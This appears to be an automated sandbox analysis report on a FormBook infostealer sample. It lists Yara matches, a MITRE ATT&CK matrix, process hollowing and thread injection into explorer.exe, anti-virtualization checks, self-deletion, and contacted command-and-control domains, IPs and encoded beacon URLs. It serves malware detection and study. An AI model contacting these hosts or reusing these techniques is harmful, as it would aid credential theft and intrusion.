          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 5.2.divpCHa0h7.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.divpCHa0h7.exe.3c268a0.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.divpCHa0h7.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.divpCHa0h7.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.divpCHa0h7.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.divpCHa0h7.exe.3bdc680.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.361762124.00000000005D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.290893406.0000000006D39000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.307316377.0000000006D39000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000001.265367323.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.361396861.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.519918692.0000000002660000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.361951579.00000000009D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.517884800.0000000000610000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.267848070.0000000003AB9000.00000004.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 5.2.divpCHa0h7.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.divpCHa0h7.exe.3c268a0.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.divpCHa0h7.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.divpCHa0h7.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.divpCHa0h7.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.divpCHa0h7.exe.3bdc680.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.361762124.00000000005D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.290893406.0000000006D39000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.307316377.0000000006D39000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000001.265367323.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.361396861.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.519918692.0000000002660000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.361951579.00000000009D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.517884800.0000000000610000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.267848070.0000000003AB9000.00000004.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection512Masquerading1OS Credential DumpingSecurity Software Discovery221Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection512NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information4Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing23DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobFile Deletion1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 502315 Sample: divpCHa0h7.exe Startdate: 13/10/2021 Architecture: WINDOWS Score: 100 33 www.kangrungao.com 2->33 35 www.begukiu0.info 2->35 37 a.mb.cn 2->37 45 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->45 47 Found malware configuration 2->47 49 Malicious sample detected (through community Yara rule) 2->49 51 6 other signatures 2->51 10 divpCHa0h7.exe 6 2->10         started        signatures3 process4 file5 31 C:\Users\user\AppData\...\divpCHa0h7.exe.log, ASCII 10->31 dropped 63 Detected unpacking (changes PE section rights) 10->63 65 Tries to detect virtualization through RDTSC time measurements 10->65 14 divpCHa0h7.exe 10->14         started        17 divpCHa0h7.exe 10->17         started        19 divpCHa0h7.exe 10->19         started        signatures6 process7 signatures8 67 Modifies the context of a thread in another process (thread injection) 14->67 69 Maps a DLL or memory area into another process 14->69 71 Sample uses process hollowing technique 14->71 73 Queues an APC in another process (thread injection) 14->73 21 msdt.exe 14->21         started        24 explorer.exe 14->24 injected process9 dnsIp10 53 Self deletion via cmd delete 21->53 55 Modifies the context of a thread in another process (thread injection) 21->55 57 Maps a DLL or memory area into another process 21->57 59 Tries to detect virtualization through RDTSC time measurements 21->59 27 cmd.exe 1 21->27         started        39 www.sanlifalan.com 104.165.34.6, 49768, 80 EGIHOSTINGUS United States 24->39 41 websites076.homestead.com 108.167.135.122, 49789, 80 UNIFIEDLAYER-AS-1US United States 24->41 43 6 other IPs or domains 24->43 61 System process connects to network (likely due to code injection or exploit) 24->61 signatures11 process12 process13 29 conhost.exe 27->29         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          divpCHa0h7.exe16%VirustotalBrowse
          divpCHa0h7.exe17%ReversingLabs

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          5.2.divpCHa0h7.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          5.1.divpCHa0h7.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          www.sanlifalan.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.jiyu-kobo.co.jp/CursJ0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cna-d0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.collada.org/2005/11/COLLADASchema9Done0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cnl0%URL Reputationsafe
          http://www.founder.com.cn/cn/c0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/Y0zS0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/.0%URL Reputationsafe
          http://www.fonts.comn0%URL Reputationsafe
          http://www.founder.com.cn/cn_0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/Y00%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/a-e70%Avira URL Cloudsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.floaterslaser.com/fqiq/?z0DH=f0Dtar1PYnAdDzS&ZvEd=cd5R1bQkGt60ucaw3I3E0k/wUnqrUWXrQueIKe7m3jIZGD6slZfTAntz2qvR4Gb0BO+l0%Avira URL Cloudsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.founder.com.cn/cnr-f0%Avira URL Cloudsafe
          www.esyscoloradosprings.com/fqiq/0%Avira URL Cloudsafe
          http://www.fontbureau.comasno0%Avira URL Cloudsafe
          http://www.sanlifalan.com/fqiq/?ZvEd=prTEVkQtidVRbelnknUsCYHPcHrUQSHWronmvObfBYwGPcpLSCQwPhh2tosJT24FW2ZT&z0DH=f0Dtar1PYnAdDzS0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/Gras0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
          http://www.fonts.comX0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/t0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/o0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.sajatypeworks.coma-d0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/ri0%Avira URL Cloudsafe
          http://www.esyscoloradosprings.com/fqiq/?ZvEd=KZhYdxsAX/C25xiOpksKfhNe7DL7yKRLCy2J/73TfqSfqYhWOiYMofna8My9QnEOoaqj&z0DH=f0Dtar1PYnAdDzS0%Avira URL Cloudsafe
          http://www.ribbonofficial.com/fqiq/?z0DH=f0Dtar1PYnAdDzS&ZvEd=MhZqZeIh1bEx9EPhBOs++VNt6zdxCxYLlsX+VD+R30361cyojbkVOC5VQe1OoxOfJLYr0%Avira URL Cloudsafe
          http://www.mambacustomboats.com/fqiq/?ZvEd=oM7C4s4K9Ux9NUwG97tedYlymorHgm5Kv3Umj1Gnv/i5ubiDMWU/+XDfdu3U3Pyuil7R&z0DH=f0Dtar1PYnAdDzS0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.sanlifalan.com
          		104.165.34.6
          		truetrueunknown
          floaterslaser.com
          		81.169.145.161
          		truefalse
            		high
            www.mambacustomboats.com
            		64.190.62.111
            		truefalse
              		high
              shops.myshopify.com
              		23.227.38.74
              		truefalse
                		high
                websites076.homestead.com
                		108.167.135.122
                		truefalse
                  		high
                  a.mb.cn
                  		8.212.24.67
                  		truefalse
                    		high
                    www.esyscoloradosprings.com
                    		unknown
                    		unknownfalse
                      		high
                      www.kangrungao.com
                      		unknown
                      		unknownfalse
                        		high
                        www.begukiu0.info
                        		unknown
                        		unknownfalse
                          		high
                          www.ribbonofficial.com
                          		unknown
                          		unknownfalse
                            		high
                            www.floaterslaser.com
                            		unknown
                            		unknownfalse
                              		high

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              http://www.floaterslaser.com/fqiq/?z0DH=f0Dtar1PYnAdDzS&ZvEd=cd5R1bQkGt60ucaw3I3E0k/wUnqrUWXrQueIKe7m3jIZGD6slZfTAntz2qvR4Gb0BO+ltrue
                              • Avira URL Cloud: safe
                              		unknown
                              www.esyscoloradosprings.com/fqiq/true
                              • Avira URL Cloud: safe
                              		low
                              http://www.sanlifalan.com/fqiq/?ZvEd=prTEVkQtidVRbelnknUsCYHPcHrUQSHWronmvObfBYwGPcpLSCQwPhh2tosJT24FW2ZT&z0DH=f0Dtar1PYnAdDzStrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.esyscoloradosprings.com/fqiq/?ZvEd=KZhYdxsAX/C25xiOpksKfhNe7DL7yKRLCy2J/73TfqSfqYhWOiYMofna8My9QnEOoaqj&z0DH=f0Dtar1PYnAdDzStrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.ribbonofficial.com/fqiq/?z0DH=f0Dtar1PYnAdDzS&ZvEd=MhZqZeIh1bEx9EPhBOs++VNt6zdxCxYLlsX+VD+R30361cyojbkVOC5VQe1OoxOfJLYrtrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.mambacustomboats.com/fqiq/?ZvEd=oM7C4s4K9Ux9NUwG97tedYlymorHgm5Kv3Umj1Gnv/i5ubiDMWU/+XDfdu3U3Pyuil7R&z0DH=f0Dtar1PYnAdDzStrue
                              • Avira URL Cloud: safe
                              		unknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              http://www.fontbureau.com/designersGdivpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpfalse
                                		high
                                http://www.jiyu-kobo.co.jp/CursJdivpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.fontbureau.com/designers/?divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpfalse
                                  		high
                                  http://www.founder.com.cn/cn/bThedivpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fontbureau.com/designers?divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpfalse
                                    		high
                                    http://www.founder.com.cn/cna-ddivpCHa0h7.exe, 00000001.00000003.248765539.0000000005A1D000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.tiro.comdivpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.fontbureau.com/designersdivpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpfalse
                                      		high
                                      http://www.goodfont.co.krdivpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.collada.org/2005/11/COLLADASchema9DonedivpCHa0h7.exe, 00000001.00000002.267439269.0000000002AB1000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.sajatypeworks.comdivpCHa0h7.exe, 00000001.00000003.246488006.00000000059FB000.00000004.00000001.sdmp, divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.typography.netDdivpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.founder.com.cn/cn/cThedivpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.galapagosdesign.com/staff/dennis.htmdivpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://fontfabrik.comdivpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.founder.com.cn/cnldivpCHa0h7.exe, 00000001.00000003.248804655.00000000059E4000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.founder.com.cn/cn/cdivpCHa0h7.exe, 00000001.00000003.249127036.00000000059E4000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.jiyu-kobo.co.jp/Y0zSdivpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.jiyu-kobo.co.jp/.divpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.fonts.comndivpCHa0h7.exe, 00000001.00000003.246591944.00000000059FB000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.founder.com.cn/cn_divpCHa0h7.exe, 00000001.00000003.248765539.0000000005A1D000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.galapagosdesign.com/DPleasedivpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.jiyu-kobo.co.jp/Y0divpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.jiyu-kobo.co.jp/a-e7divpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.fonts.comdivpCHa0h7.exe, 00000001.00000003.246781947.00000000059FB000.00000004.00000001.sdmpfalse
                                        		high
                                        http://www.sandoll.co.krdivpCHa0h7.exe, 00000001.00000003.247974313.00000000059E6000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.urwpp.deDPleasedivpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.zhongyicts.com.cndivpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.sakkal.comdivpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.founder.com.cn/cnr-fdivpCHa0h7.exe, 00000001.00000003.248765539.0000000005A1D000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.apache.org/licenses/LICENSE-2.0divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpfalse
                                          		high
                                          http://www.fontbureau.comdivpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpfalse
                                            		high
                                            http://www.fontbureau.comasnodivpCHa0h7.exe, 00000001.00000003.266066263.00000000059E0000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.jiyu-kobo.co.jp/GrasdivpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
